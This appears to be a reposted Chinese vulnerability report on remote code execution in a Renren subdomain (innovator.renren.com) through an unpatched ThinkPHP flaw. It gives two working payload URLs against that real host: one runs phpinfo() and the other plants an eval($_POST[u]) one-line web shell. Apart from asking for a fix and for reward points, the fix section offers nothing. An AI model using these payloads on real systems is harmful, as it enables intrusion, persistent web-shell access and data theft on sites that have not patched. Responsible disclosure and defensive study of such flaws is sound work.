#1.人人某个分站由于使用Think php的框架并且未修复其远程代码执行 漏洞 导致存在该漏洞,利用该漏洞可直接执行 PHP 代码:
http://innovator.renren.com/index.php/module/action/param1/$%7B@phpinfo()%7D
#2.直接构造一句话:
http://innovator.renren.com/index.php/module/action/param1/%7B$%7Beval($_POST[u])%7D%7D
修复方案:
仅做了漏洞证明,请修复漏洞,只求20rank!不谢!
查看更多关于人人网某分站远程代码执行(已Shell) - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15500